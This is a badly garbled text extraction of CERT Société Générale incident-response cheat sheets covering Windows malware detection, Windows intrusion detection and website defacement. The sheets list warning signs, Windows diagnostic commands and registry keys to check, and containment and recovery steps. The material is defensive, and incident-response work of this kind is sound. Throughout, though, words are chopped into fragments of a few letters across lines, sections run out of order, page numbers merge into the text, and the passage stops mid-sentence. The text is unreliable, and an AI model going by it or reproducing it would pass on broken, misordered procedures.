cont
aini
ng th
e sy
stem
, and
to
anal
yse
the
copy
usi
ng fo
rens
ic to
ols
like
EnC
ase
or X
-Way
s.
22
Gen
eral
sig
ns o
f mal
war
e pr
esen
ce o
n th
e de
skto
p S
ever
al le
ads
mig
ht h
int t
hat t
he s
yste
m c
ould
be
com
prom
ised
by
a m
alw
are:
■■
Ant
iviru
s ra
isin
g an
ale
rt or
una
ble
to u
pdat
e its
sig
natu
res
or s
topp
ing
to ru
n or
una
ble
to ru
n ev
en m
anua
lly
■■ U
nusu
al h
ard-
disk
act
ivity
: th
e ha
rd d
rive
mak
es h
uge
oper
atio
ns a
t une
xpec
ted
time.
■■ U
nusu
ally
slo
w c
ompu
ter:
whi
le i
t w
as u
sual
ly d
eliv
erin
g go
od s
peed
, it g
ot s
low
er re
cent
ly
■■ U
nusu
al n
etw
ork
activ
ity: I
nter
net c
onne
ctio
n is
ver
y sl
ow
mos
t of t
he b
row
sing
tim
e.
■■ Th
e co
mpu
ter r
eboo
ts w
ithou
t rea
son.
■■ S
ome
appl
icat
ions
are
cra
shin
g, u
nexp
ecte
dly.
■■ P
op-u
p w
indo
ws
are
appe
arin
g w
hile
bro
wsi
ng o
n th
e w
eb. (
som
etim
es e
ven
with
out b
row
sing
)
■■ Yo
ur I
P a
ddre
ss (
if st
atic
) is
bla
cklis
ted
on o
ne o
r m
ore
Inte
rnet
Bla
ck L
ists
.
■■ P
eopl
e ar
e co
mpl
aini
ng
abou
t yo
u e-
mai
ling
them
/reac
hing
them
by
IM e
tc. w
hile
you
did
not
. A
ctio
ns b
elow
use
s de
faul
t W
indo
ws
tool
s. A
utho
rized
use
rs
can
use
the
Sysi
nter
nals
Tro
uble
shoo
ting
Util
ities
to
perfo
rm
thes
e ta
sks.
22
8498
Con
tain
men
t
Rem
edia
tion
Rec
over
y
Afte
rmat
h
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#7
W
indo
ws
Mal
war
e D
etec
tion
Live
Ana
lysi
s on
a s
uspi
ciou
s co
mpu
ter
__
____
____
____
____
____
____
____
____
____
____
____
____
_ IR
M A
utho
r: C
ER
T / C
édric
Per
net
IRM
ver
sion
: 1.2
E
-Mai
l: ce
rt.sg
@so
cgen
.com
W
eb: h
ttp://
cert.
soci
eteg
ener
ale.
com
Tw
itter
: @C
ertS
G
Abs
trac
t
Inci
dent
han
dlin
g st
eps
This
Inci
dent
Res
pons
e M
etho
dolo
gy is
a c
heat
she
et d
edic
ated
to
han
dler
s in
vest
igat
ing
on a
pre
cise
sec
urity
issu
e.
Who
sho
uld
use
IRM
she
ets?
Adm
inis
trato
rs
S
ecur
ity O
pera
tion
Cen
ter
C
ISO
s an
d de
putie
s
CE
RTs
(Com
pute
r Em
erge
ncy
Res
pons
e Te
am)
Rem
embe
r: If
you
face
an
inci
dent
, fol
low
IRM
, tak
e no
tes
and
do n
ot p
anic
. Con
tact
CER
T im
med
iate
ly if
nee
ded
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
P
repa
ratio
n: g
et re
ady
to h
andl
e th
e in
cide
nt
Id
entif
icat
ion:
det
ect t
he in
cide
nt
C
onta
inm
ent:
limit
the
impa
ct o
f the
inci
dent
Rem
edia
tion:
rem
ove
the
thre
at
R
ecov
ery:
reco
ver t
o a
norm
al s
tage
Afte
rmat
h: d
raw
up
and
impr
ove
the
proc
ess
IRM
pro
vide
s de
taile
d in
form
atio
n fo
r eac
h st
ep.
Rep
ort
An
inci
dent
repo
rt sh
ould
be
writ
ten
and
mad
e av
aila
ble
to a
ll of
th
e st
akeh
olde
rs.
The
follo
win
g th
emes
sho
uld
be d
escr
ibed
:
■■ In
itial
det
ectio
n.
■■ A
ctio
ns a
nd ti
mel
ines
.
■■ W
hat w
ent r
ight
.
■■ W
hat w
ent w
rong
.
■■ In
cide
nt c
ost.
Cap
italiz
e
Act
ions
to im
prov
e th
e W
indo
ws
mal
war
e de
tect
ion
proc
esse
s sh
ould
be
defin
ed to
cap
italiz
e on
this
exp
erie
nce.
66
If po
ssib
le r
eins
tall
the
OS
and
app
licat
ions
and
res
tore
use
r’s
data
from
a tr
uste
d ba
ckup
s.
In c
ase
the
com
pute
r has
not
bee
n re
inst
alle
d co
mpl
etel
y:
Res
tore
file
s w
hich
cou
ld h
ave
been
cor
rupt
ed b
y th
e m
alw
are,
esp
ecia
lly s
yste
m fi
les.
R
eboo
t the
mac
hine
afte
r al
l the
cle
anin
g ha
s be
en d
one,
and
ch
eck
the
syst
em fo
r its
hea
lth, d
oing
a v
irus
scan
of t
he w
hole
sy
stem
, har
d di
sks
and
mem
ory.
55
Reb
oot
from
a l
ive
CD
and
bac
kup
all
impo
rtant
dat
a on
an
exte
rnal
sto
rage
sup
port.
If
unsu
re,
brin
g yo
ur h
ardd
isk
to t
he
help
desk
and
ask
them
to m
ake
a co
py o
f the
impo
rtant
con
tent
. R
emov
e th
e bi
narie
s an
d th
e re
late
d re
gist
ry e
ntrie
s.
■■ Fi
nd t
he b
est
prac
tices
to
rem
ove
the
mal
war
e. T
hey
can
usua
lly b
e fo
und
on A
ntiV
irus
com
pani
es w
ebsi
tes.
■■ R
un a
n on
line
antiv
irus
scan
.
■■ La
unch
a B
art
PE
- ba
sed
live
CD
con
tain
ing
disi
nfec
tion
tool
s (c
an
be
dow
nloa
ded
from
A
V
web
site
s),
or
a de
dica
ted
anti-
viru
s liv
e C
D.
44
P
ull
the
netw
ork
plug
off
phys
ical
ly,
to p
reve
nt m
ore
infe
ctio
n on
the
net
wor
k an
d to
sto
p pr
obab
le il
lega
l act
ion
bein
g do
ne
from
you
r co
mpu
ter
(the
mal
war
e co
uld
send
spa
m m
assi
vely
, ta
ke p
art t
o D
DoS
atta
ck o
r st
ore
illeg
al fi
les
on th
e sy
stem
for
exam
ple)
. S
end
the
susp
ect
bina
ries
to y
our
CE
RT,
or
requ
est
CE
RT’
s he
lp if
you
are
uns
ure
abou
t the
mal
war
e. T
he C
ER
T sh
ould
be
able
to
isol
ate
the
mal
icio
us c
onte
nt a
nd c
an s
end
it to
all
AV
co
mpa
nies
, es
peci
ally
with
con
tract
ors
of y
our
com
pany
. (T
he
best
way
is
to c
reat
e a
zipp
ed f
ile o
f th
e su
spic
ious
bin
ary,
en
cryp
ted
usin
g a
pass
wor
d).
33
8599
Prep
arat
ion
Iden
tific
atio
n Id
entif
icat
ion
■■ A
phy
sica
l ac
cess
to
the
susp
icio
us s
yste
m s
houl
d be
gi
ven
to
the
fore
nsic
in
vest
igat
or.
Phy
sica
l ac
cess
is
pr
efer
red
to r
emot
e ac
cess
, sin
ce th
e ha
cker
cou
ld d
etec
t th
e in
vest
igat
ions
don
e on
the
syst
em (b
y us
ing
a ne
twor
k sn
iffer
for e
xam
ple)
.
■■ A
phy
sica
l cop
y of
the
har
d-di
sk m
ight
be
nece
ssar
y fo
r fo
rens
ic a
nd e
vide
nce
purp
oses
. Fi
nally
, if
need
ed,
a ph
ysic
al
acce
ss
coul
d be
ne
eded
to
di
scon
nect
th
e su
spec
ted
mac
hine
from
any
net
wor
k.
■■ A
goo
d kn
owle
dge
of t
he u
sual
net
wor
k ac
tivity
of
the
mac
hine
/ser
ver
is n
eede
d. Y
ou s
houl
d ha
ve a
file
on
a se
cure
pla
ce d
escr
ibin
g th
e us
ual p
ort a
ctiv
ity, t
o co
mpa
re
effic
ient
ly to
the
curr
ent s
tate
.
■■ A
goo
d kn
owle
dge
of t
he u
sual
ser
vice
s ru
nnin
g on
the
m
achi
ne c
an b
e ve
ry h
elpf
ul.
Don
’t he
sita
te t
o as
k a
Win
dow
s E
xper
t fo
r hi
s as
sist
ance
, w
hen
appl
icab
le.
A
good
ide
a is
als
o to
hav
e a
map
of
all
serv
ices
/runn
ing
proc
ess
of th
e m
achi
ne.
It ca
n be
a
real
ad
vant
age
to
wor
k in
a
huge
co
rpor
ate
envi
ronm
ent,
whe
re a
ll us
er m
achi
nes
are
the
sam
e, i
nsta
lled
from
a
mas
ter
CD
. H
ave
a m
ap
of
all
proc
esse
s/se
rvic
es/a
pplic
atio
ns.
On
such
env
ironm
ent
whe
re
user
s ar
e no
t allo
wed
to in
stal
l sof
twar
e, c
onsi
der a
ny a
dditi
onal
pr
oces
s/se
rvic
e/ap
plic
atio
n as
sus
pici
ous.
Th
e m
ore
you
know
the
mac
hine
in it
s cl
ean
stat
e, th
e m
ore
chan
ces
you
have
to d
etec
t any
frau
dule
nt a
ctiv
ity r
unni
ng
from
it.
Ple
ase
note
that
the
Sysi
nter
nals
Tro
uble
shoo
ting
Util
ities
can
be
use
d to
per
form
mos
t of t
hese
task
s.
■■ U
nusu
al A
ccou
nts
Look
fo
r un
usua
l ac
coun
ts
crea
ted,
es
peci
ally
in
th
e A
dmin
istra
tors
gro
up:
C:\>
lusr
mgr
.msc
or
C
:\>
net
loca
lgro
up
adm
inis
trato
rs
or
net
loca
lgro
up
adm
inis
trate
urs
■■ U
nusu
al F
iles
- Loo
k fo
r unu
sual
ly b
ig fi
les
on th
e st
orag
e su
ppor
t, bi
gger
than
5M
B. (
can
be a
n in
dica
tion
of a
sys
tem
com
prom
ised
for
illeg
al
cont
ent s
tora
ge)
- Lo
ok
for
unus
ual
files
ad
ded
rece
ntly
in
sy
stem
fo
lder
s,
espe
cial
ly C
:\WIN
DO
WS
\sys
tem
32.
- Loo
k fo
r file
s us
ing
the
“hid
den”
attr
ibut
e:
C:\>
dir
/S /A
:H
- U
se “w
indi
rsta
t” if
poss
ible
. -
■■ U
nusu
al R
egis
try
Entr
ies
Look
fo
r un
usua
l pr
ogra
ms
laun
ched
at
bo
ot
time
in
the
Win
dow
s re
gist
ry, e
spec
ially
: H
KLM
\Sof
twar
e\M
icro
soft\
Win
dow
s\C
urre
ntV
ersi
on\R
un
HK
LM\S
oftw
are\
Mic
roso
ft\W
indo
ws\
Cur
rent
Ver
sion
\Run
once
H
KLM
\Sof
twar
e\M
icro
soft\
Win
dow
s\C
urre
ntV
ersi
on\R
unon
ceE
x U
se “
HiJ
ackT
his”
if p
ossi
ble.
(A
lso
have
a lo
ok in
you
r S
tartu
p fo
lder
) ■■
Unu
sual
Pro
cess
es a
nd S
ervi
ces
Che
ck
all
runn
ing
proc
esse
s fo
r un
usua
l/unk
now
n en
tries
, es
peci
ally
pr
oces
ses
with
us
erna
me
“SY
STE
M”
and
“AD
MIN
ISTR
ATO
R”:
C:\>
task
mgr
.exe
(o
r tlis
k, ta
sklis
t dep
endi
ng o
n W
indo
ws
rele
ase)
U
se “p
sexp
lore
r” if
pos
sibl
e.
■■ C
heck
use
r’s a
utos
tart
fold
ers
C:\D
ocum
ents
and
Set
tings
\use
r\Sta
rt M
enu\
Pro
gram
s\S
tartu
p C
:\Win
NT\
Pro
files
\use
r\Sta
rt M
enu\
Pro
gram
s\S
tartu
p
■■ Lo
ok
for
unus
ual/u
nexp
ecte
d ne
twor
k se
rvic
es
inst
alle
d an
d st
arte
d C
:\> s
ervi
ces.
msc
C
:\> n
et s
tart
■■ U
nusu
al N
etw
ork
Act
ivity
- C
heck
for f
ile s
hare
s an
d ve
rify
each
one
is li
nked
to a
nor
mal
ac
tivity
: C
:\> n
et v
iew
\\12
7.0.
0.1
Use
“tcp
view
” if p
ossi
ble.
1122
- Loo
k at
the
open
ed s
essi
ons
on th
e m
achi
ne:
C:\>
net
ses
sion
-
Hav
e a
look
at
the
sess
ions
the
mac
hine
has
ope
ned
with
ot
her s
yste
ms:
C
:\> n
et u
se
- Che
ck fo
r any
sus
pici
ous
Net
bios
con
nexi
on:
C:\>
nbt
stat
–S
- L
ook
for a
ny s
uspi
ciou
s ac
tivity
on
the
syst
em’s
por
ts :
C:\>
net
stat
–na
5
(5 m
akes
it b
eing
refre
shed
eac
h 5
seco
nds)
U
se –
o fla
g fo
r W
indo
ws
XP
/200
3 to
see
the
ow
ner
of e
ach
proc
ess:
C
:\> n
etst
at –
nao
5 U
se “f
port”
if p
ossi
ble.
■■
Unu
sual
Aut
omat
ed T
asks
Lo
ok a
t the
list
of s
ched
uled
task
s fo
r any
unu
sual
ent
ry:
C:\>
at
On
Win
dow
s 20
03/X
P: C
:\> s
chta
sks
■■ U
nusu
al L
og E
ntrie
s W
atch
you
r log
file
s fo
r unu
sual
ent
ries:
C
:\> e
vent
vwr.m
sc
If po
ssib
le, u
se “E
vent
Log
Vie
wer
” or s
uch
tool
S
earc
h fo
r ev
ents
affe
ctin
g th
e fir
ewal
l, th
e an
tiviru
s, t
he f
ile
prot
ectio
n, o
r any
sus
pici
ous
new
ser
vice
. Lo
ok f
or a
hug
e am
ount
of
faile
d lo
gin
atte
mpt
s or
lock
ed o
ut
acco
unts
. W
atch
you
r fire
wal
l (if
any)
log
files
for s
uspe
ct a
ctiv
ity.
■■ R
ootk
it ch
eck
Run
“R
ootk
it R
evea
ler”,
“R
ootk
it H
ooke
r”,
“Ice
Sw
ord”
, “R
k D
etec
tor”,
“Sys
Insp
ecto
r”, “R
ootk
it B
uste
r”.
It’s
alw
ays
bette
r to
run
seve
ral o
f the
se to
ols
than
onl
y on
e.
■■ M
alw
are
chec
k R
un a
t lea
st o
ne a
nti-v
irus
prod
uct o
n th
e w
hole
dis
k. If
pos
sibl
e us
e se
vera
l ant
i-viru
s. T
he a
nti-v
irus
mus
t ab
solu
tely
be
up-to
-da
te.
22
86100
C
onta
inm
ent
Rem
edia
tion
Rec
over
y
Afte
rmat
h
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#2
W
indo
ws
Intr
usio
n D
etec
tion
Live
Ana
lysi
s on
a s
uspi
ciou
s W
indo
ws
syst
em
__
____
____
____
____
____
____
____
____
____
____
____
____
_ IR
M A
utho
r: C
ER
T S
G/ C
edric
Per
net
IRM
ver
sion
: 1.2
E
-Mai
l: ce
rt.sg
@so
cgen
.com
W
eb: h
ttp://
cert.
soci
eteg
ener
ale.
com
Tw
itter
: @C
ertS
G
Abs
trac
t
Inci
dent
han
dlin
g st
eps
If
the
mac
hine
is
co
nsid
ered
cr
itica
l fo
r yo
ur
com
pany
’s
busi
ness
ac
tivity
an
d ca
n’t
be
disc
onne
cted
, ba
ckup
al
l im
porta
nt d
ata
in c
ase
the
hack
er n
otic
es y
ou’re
inv
estig
atin
g an
d st
arts
del
etin
g fil
es.
Als
o m
ake
a co
py o
f th
e sy
stem
’s
mem
ory
for
furth
er
anal
ysis
. (u
se
tool
s su
ch
as
Mem
oryz
e,w
in32
dd e
tc.)
If th
e m
achi
ne is
not
con
side
red
criti
cal f
or y
our
com
pany
and
ca
n be
dis
conn
ecte
d, s
hut
the
mac
hine
dow
n th
e ha
rd w
ay,
rem
ovin
g its
pow
er p
lug.
If
it is
a la
ptop
with
a b
atte
ry o
n, ju
st
push
the
“of
f” bu
tton
for
som
e se
cond
s un
til t
he c
ompu
ter
switc
hes
off.
Offl
ine
inve
stig
atio
ns s
houl
d be
sta
rted
right
aw
ay i
f th
e liv
e an
alys
is d
idn’
t gi
ve a
ny r
esul
t, bu
t th
e sy
stem
sho
uld
still
be
cons
ider
ed c
ompr
omis
ed.
Mak
e a
phys
ical
cop
y (b
it by
bit)
of t
he w
hole
har
d di
sk o
n an
ex
tern
al s
tora
ge s
uppo
rt, u
sing
EnC
ase,
X-W
ays,
or
sim
ilar
fore
nsic
tool
(dd,
ddr
escu
e et
c.).
Try
to fi
nd e
vide
nces
of e
very
act
ion
of th
e ha
cker
: ■■
Find
all
files
use
d by
the
atta
cker
, inc
ludi
ng d
elet
ed fi
les
(use
you
r for
ensi
c to
ols)
and
see
wha
t has
bee
n do
ne w
ith
it or
at
leas
t th
eir
func
tiona
lity,
in
orde
r to
eva
luat
e th
e th
reat
.
■■ C
heck
all
files
acc
esse
d re
cent
ly.
■■ In
spec
t net
wor
k sh
ares
to s
ee if
the
mal
war
e ha
s sp
read
th
roug
h it.
■■
Mor
e ge
nera
lly, t
ry to
find
how
the
atta
cker
got
into
the
syst
em.
All
lead
s sh
ould
be
cons
ider
ed.
If no
com
pute
r pr
oof o
f the
intru
sion
is fo
und,
nev
er fo
rget
it c
ould
com
e fro
m
a ph
ysic
al
acce
ss
or
a co
mpl
icity
/ste
alin
g of
in
form
atio
n fro
m a
n em
ploy
ee.
■■ A
pply
fix
es
whe
n ap
plic
able
(o
pera
ting
syst
em
and
appl
icat
ions
), in
ca
se
the
atta
cker
us
ed
a kn
own
vuln
erab
ility
.
In c
ase
the
syst
em h
as b
een
com
prom
ised
:
■■ Te
mpo
rary
rem
ove
all a
cces
ses
to th
e ac
coun
ts in
volv
ed
in th
e in
cide
nt.
■■ R
emov
e al
l mal
icio
us fi
les
inst
alle
d by
the
atta
cker
.
No
mat
ter h
ow fa
r the
hac
ker h
as g
one
into
the
syst
em a
nd th
e kn
owle
dge
you
mig
ht h
ave
abou
t the
com
prom
issi
on, a
s lo
ng a
s th
e sy
stem
ha
s be
en
pene
trate
d,
the
best
pr
actic
e is
to
re
inst
all t
he s
yste
m f
ully
fro
m o
rigin
al m
edia
and
app
ly a
ll fix
es to
the
new
ly in
stal
led
syst
em.
In c
ase
this
sol
utio
n ca
n’t b
e ap
plie
d, y
ou s
houl
d:
■■ C
hang
e al
l th
e sy
stem
’s a
ccou
nts
pass
wor
ds,
and
mak
e yo
ur u
sers
do
so in
a s
ecur
e w
ay: t
hey
shou
ld u
se
pass
wor
ds
with
up
per/l
ower
ca
se,
spec
ial
char
acte
rs,
num
bers
, and
at l
east
be
8 ch
arac
ters
long
. ■■
Res
tore
all
files
that
cou
ld h
ave
been
cha
nged
(Exa
mpl
e:
svch
ost.e
xe) b
y th
e at
tack
er.
5533
This
Inci
dent
Res
pons
e M
etho
dolo
gy is
a c
heat
she
et d
edic
ated
to
inci
dent
han
dler
s in
vest
igat
ing
a pr
ecis
e se
curit
y is
sue.
W
ho s
houl
d us
e IR
M s
heet
s?
• A
dmin
istra
tors
•
Sec
urity
Ope
ratio
n C
ente
r •
CIS
Os
and
depu
ties
• C
ER
Ts (C
ompu
ter E
mer
genc
y R
espo
nse
Team
) R
emem
ber:
If y
ou f
ace
an in
cide
nt, f
ollo
w IR
M, t
ake
note
s an
d do
no
t pa
nic.
C
onta
ct
your
C
ERT
imm
edia
tely
if
need
ed.
Rep
ort
A c
risis
repo
rt sh
ould
be
writ
ten
and
mad
e av
aila
ble
to a
ll of
the
acto
rs o
f the
cris
is m
anag
emen
t cel
l. Th
e fo
llow
ing
them
es s
houl
d be
des
crib
ed:
■■ In
itial
det
ectio
n
■■ A
ctio
ns a
nd ti
mel
ines
of e
very
impo
rtant
eve
nt
■■ W
hat w
ent r
ight
■■ W
hat w
ent w
rong
■■ In
cide
nt c
ost
Cap
italiz
e
Act
ions
to
im
prov
e th
e
Win
dow
s in
trusi
on
dete
ctio
n m
anag
emen
t pr
oces
ses
shou
ld b
e de
fined
to c
apita
lize
on th
is
expe
rienc
e.
66
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
Pre
para
tion:
get
read
y to
han
dle
the
inci
dent
Id
entif
icat
ion:
det
ect t
he in
cide
nt
Con
tain
men
t: lim
it th
e im
pact
of t
he in
cide
nt
Rem
edia
tion:
rem
ove
the
thre
at
Rec
over
y: re
cove
r to
a no
rmal
sta
ge
Afte
rmat
h: d
raw
up
and
impr
ove
the
proc
ess
44
IRM
pro
vide
s de
taile
d in
form
atio
n fo
r eac
h st
ep.
Th
is d
ocum
ent i
s fo
r pub
lic u
se
87101
Pre
para
tion
Iden
tific
atio
n C
onta
inm
ent
Obj
ectiv
e:
Est
ablis
h co
ntac
ts,
defin
e pr
oced
ures
, an
d ga
ther
in
form
atio
n to
sa
ve
time
durin
g an
atta
ck.
■■
Hav
e up
-to-
date
sc
hem
es
desc
ribin
g yo
ur
appl
icat
ive
com
pone
nts
rela
ted
to
the
web
se
rver
. ■■
B
uild
a
back
up
web
site
up
an
d re
ady,
on
w
hich
you
can
pub
lish
cont
ent.
■■
Def
ine
a pr
oced
ure
to r
edire
ct e
very
vis
itor
to
this
bac
kup
web
site
. ■■
D
eplo
y m
onito
ring
tool
s to
qui
ckly
det
ect
any
abno
rmal
beh
avio
ur o
n yo
ur c
ritic
al w
ebsi
tes.
■■
E
xpor
t th
e w
eb s
erve
r’s lo
g fil
es t
o an
ext
erna
l se
rver
. M
ake
sure
cl
ocks
ar
e sy
nchr
oniz
ed
betw
een
each
ser
ver.
■■
R
efer
ence
ex
tern
al
cont
ents
(s
tatic
or
dy
nam
ic)
and
crea
te a
lis
t fo
r ea
ch o
f th
em.
Don
’t fo
rget
third
par
ties
for
adve
rtis
emen
t. ■■
R
efer
ence
co
ntac
t po
ints
of
yo
ur
host
ing
prov
ider
. ■■
B
e su
re
your
ho
stin
g pr
ovid
er
enfo
rces
po
licie
s to
log
all e
vent
s.
■■
Mak
e su
re
you
have
an
up-t
o-da
te n
etw
ork
map
.
Obj
ectiv
e:
Det
ect
the
inci
dent
, de
term
ine
its
scop
e, a
nd in
volv
e th
e ap
prop
riate
par
ties.
U
sual
cha
nnel
s of
det
ectio
n ar
e:
■■
Web
page
mon
itorin
g: T
he c
onte
nt o
f a
web
pag
e ha
s be
en a
ltere
d. T
he n
ew c
onte
nt i
s ei
ther
ver
y di
scre
et
(an
“ifra
me”
in
ject
ion
for
exam
ple)
or
ob
viou
s (“
You
hav
e be
en 0
wn3
d by
xxx
”)
■■
Use
r:
user
s ca
ll or
no
tific
atio
n fr
om
empl
oyee
s ab
out
prob
lem
s th
ey
notic
ed
whi
le
brow
sing
th
e w
ebsi
te.
■■
Sec
urity
ch
ecks
w
ith
tool
s su
ch
as
Goo
gle
Saf
eBro
wsi
ng
Ver
ify th
e de
face
men
t and
det
ect i
ts o
rigin
: ■■
C
heck
file
s w
ith s
tatic
con
tent
(in
par
ticul
ar,
chec
k th
e m
odifi
catio
n da
tes,
has
h si
gnat
ure)
.
■■
Che
ck m
ashu
p co
nten
t pro
vide
rs.
■■
Che
ck l
ink
pres
ents
in
the
web
pag
e (s
rc,
met
a,
css,
scr
ipt,
…).
■■
Che
ck lo
g fil
es.
■■
Sca
n th
e da
taba
ses
for
mal
icio
us c
onte
nt.
� ��� T
he s
ourc
e co
de o
f th
e su
spic
ious
pag
e m
ust
be a
naly
sed
care
fully
to
iden
tify
the
prob
lem
cle
arly
. In
pa
rtic
ular
, be
sur
e th
e pr
oble
m i
s on
a w
eb s
erve
r be
long
ing
to t
he c
ompa
ny a
nd n
ot o
n a
web
con
tent
lo
cate
d ou
tsid
e yo
ur
infr
astr
uctu
re,
like
com
mer
cial
ba
nner
s fr
om a
third
par
ty.
Obj
ectiv
e:
Miti
gate
th
e at
tack
’s
effe
cts
on
the
targ
eted
env
ironm
ent.
■■
Bac
kup
all
data
st
ored
on
th
e w
eb
serv
er
for
fore
nsic
pu
rpos
es
and
evid
ence
co
llect
ing.
T
he
best
pr
actic
e he
re
if ap
plic
able
is
to
m
ake
a co
mpl
ete
bit-
by-b
it co
py o
f th
e ha
rd-d
isk
cont
aini
ng
the
web
se
rver
. T
his
will
be
he
lpfu
l to
re
cove
r de
lete
d fil
es.
■■
Che
ck
your
ne
twor
k ar
chite
ctur
e m
ap.
Ver
ify
that
the
vuln
erab
ility
exp
loite
d by
the
atta
cker
is
not l
ocat
ed s
omew
here
els
e :
- C
heck
the
sys
tem
on
whi
ch t
he w
eb s
erve
r is
ru
nnin
g,
- C
heck
oth
er s
ervi
ces
runn
ing
on th
at m
achi
ne,
- C
heck
the
con
nect
ions
to
othe
r sy
stem
s, w
hich
m
ight
be
com
prom
ised
. If
the
sour
ce o
f th
e at
tack
is
anot
her
syst
em o
n th
e ne
twor
k,
disc
onne
ct
it if
poss
ible
ph
ysic
ally
an
d in
vest
igat
e on
it.
Try
to fi
nd e
vide
nces
of e
very
act
ion
of th
e at
tack
er:
■■
Fin
d ou
t how
the
atta
cker
got
into
the
syst
em in
th
e fir
st p
lace
and
fix
it :
-
Web
com
pone
nt v
ulne
rabi
lity
allo
win
g w
rite
acce
ss:
fix th
e vu
lner
abili
ty b
y ap
plyi
ng e
dito
r’s fi
x.
- O
pen
publ
ic fo
lder
: fix
the
bug.
-
SQ
L w
eakn
ess
allo
win
g in
ject
ion:
cor
rect
the
code
. -
Mas
hup
com
pone
nts:
cut
mas
hup
feed
. -
Adm
inis
trat
ive
mod
ifica
tion
by
phys
ical
ac
cess
: m
odify
the
acce
ss r
ight
s.
■■
If re
quire
d (c
ompl
ex i
ssue
and
ver
y im
port
ant
web
ser
ver)
, dep
loy
a te
mpo
rary
web
ser
ver
, up
to
da
te
with
its
ap
plic
atio
ns.
It sh
ould
of
fer
the
sam
e co
nten
t th
an th
e co
mpr
omis
ed w
eb s
erve
r or
at
lea
st s
how
ano
ther
leg
itim
ate
cont
ent
such
as
“Tem
pora
ry u
nava
ilabl
e”.
The
bes
t is
to
disp
lay
a te
mpo
rary
st
atic
co
nten
t, co
ntai
ning
on
ly
HT
ML
code
. T
his
prev
ents
ano
ther
inf
ectio
n in
cas
e th
e at
tack
er
has
used
vu
lner
abili
ty
in
the
legi
timat
e P
HP
/AS
P/C
GI/P
L/et
c. c
ode.
11
22
33
88102
Rem
edia
tion
Rec
over
y
Afte
rmat
h
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#6
Web
site
Def
acem
ent
Live
rea
ctio
n on
a c
ompr
omis
ed w
eb s
erve
r
____
____
____
____
____
____
____
____
____
____
____
____
___
IRM
Aut
hor:
CE
RT
SG
/ C
édric
Per
net
IRM
ver
sion
: 1.2
E
-Mai
l: ce
rt.s
g@so
cgen
.com
W
eb: h
ttp://
cert
.soc
iete
gene
rale
.com
T
witt
er: @
Cer
tSG
Abs
trac
t
Inci
dent
han
dlin
g st
eps
Obj
ectiv
e: T
ake
actio
ns t
o re
mov
e th
e th
reat
an
d av
oid
futu
re d
efac
emen
ts.
Rem
ove
all
alte
red
cont
ent
and
rep
lace
it
with
th
e le
gitim
ate
cont
ent,
rest
ored
fr
om
earli
er
back
up.
Mak
e su
re
this
co
nten
t is
fr
ee
from
vu
lner
abili
ties.
Obj
ectiv
e:
Res
tore
th
e sy
stem
to
no
rmal
op
erat
ions
.
■■
Cha
nge
all
user
pa
ssw
ords
, if
the
web
se
rver
pro
vide
s us
er-a
uthe
ntic
atio
n, a
nd y
ou
have
evi
denc
e/re
ason
s to
thi
nk t
he p
assw
ords
m
ay
have
be
en
com
prom
ised
. T
his
can
requ
ire a
larg
e us
er c
omm
unic
atio
n ■■
If
back
up s
erve
r ha
s be
en u
sed,
res
tore
the
prim
ary
web
ser
ver
com
pone
nt a
s no
min
al
serv
er.
Obj
ectiv
e:
Doc
umen
t th
e in
cide
nt’s
de
tails
, di
scus
s le
sson
s le
arne
d, a
nd a
djus
t pl
ans
and
defe
nces
. C
omm
unic
atio
n If
the
defa
cem
ent
has
been
vis
ible
for
par
t of
you
r us
ers,
pla
n to
exp
lain
the
inci
dent
pub
licly
. R
epor
t
A c
risis
rep
ort s
houl
d be
writ
ten
and
mad
e av
aila
ble
to a
ll of
the
invo
lved
par
ties.
T
he fo
llow
ing
them
es s
houl
d be
des
crib
ed:
■■
Initi
al d
etec
tion;
■■
Act
ions
and
tim
elin
es;
■■
Wha
t wen
t rig
ht;
■■
Wha
t wen
t wro
ng;
■■
Inci
dent
cos
t. In
ca
se
of
vuln
erab
ility
di
scov
ery,
re
port
an
y un
docu
men
ted
vuln
erab
ility
ly
ing
on
a pr
oduc
t ru
nnin
g on
the
web
ser
ver
(like
a P
HP
for
um)
to i
ts
edito
r, s
o th
at t
he c
ode
can
be u
pgra
ded
in o
rder
to
rele
ase
a fix
.
Thi
s In
cide
nt R
espo
nse
Met
hodo
logy
is a
che
at s
heet
ded
icat
ed
to h
andl
ers
inve
stig
atin
g on
a p
reci
se s
ecur
ity is
sue.
W
ho s
houl
d us
e IR
M s
heet
s?
• A
dmin
istr
ator
s •
Sec
urity
Ope
ratio
n C
ente
r
• C
ISO
s an
d de
putie
s •
CE
RT
s (C
ompu
ter
Em
erge
ncy
Res
pons
e T
eam
) R
emem
ber:
If
you
face
an
inci
dent
, fo
llow
IR
M,
take
not
es
and
do
not
pani
c.
Con
tact
yo
ur
CE
RT
im
med
iate
ly
if ne
eded
.
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
� ���
Pre
para
tion:
get
rea
dy to
han
dle
the
inci
dent
� � ��
Iden
tific
atio
n: d
etec
t the
inci
dent
� � ��
Con
tain
men
t: lim
it th
e im
pact
of t
he in
cide
nt
� ��� R
emed
iatio
n: r
emov
e th
e th
reat
� � ��
Rec
over
y: r
ecov
er to
a n
orm
al s
tage
� ���
Afte
rmat
h: d
raw
up
and
impr
ove
the
proc
ess
IR
M p
rovi
des
deta
iled
info
rmat
ion
for
each
ste
p.
T
his
docu
men
t is
for
publ
ic u
se
44 55
66
89103
Pre
par
atio
n
Id
enti
fica
tio
n
Iden
tifi
cati
on
Iden
tifi
cati
on
■■
A p
hysi
cal
acce
ss t
o th
e su
spic
ious
sys
tem
sho
uld
be
offe
red
to th
e fo
rens
ic in
vest
igat
or.
■■
A p
hysi
cal
copy
of
the
hard
-dis
k m
ight
be
nece
ssar
y fo
r fo
rens
ic a
nd e
vide
nce
purp
oses
. If
need
ed,
a ph
ysic
al
acce
ss c
ould
be
nece
ssar
y to
dis
conn
ect
the
susp
ecte
d m
achi
ne fr
om a
ny n
etw
ork.
■■
A g
ood
know
ledg
e of
the
usu
al n
etw
ork
activ
ity o
f th
e m
achi
ne/s
erve
r is
nee
ded.
You
sho
uld
have
a f
ile o
n a
secu
re p
lace
des
crib
ing
the
usua
l por
t ac
tivity
, to
com
pare
ef
ficie
ntly
to th
e cu
rren
t sta
te.
■■
A g
ood
know
ledg
e of
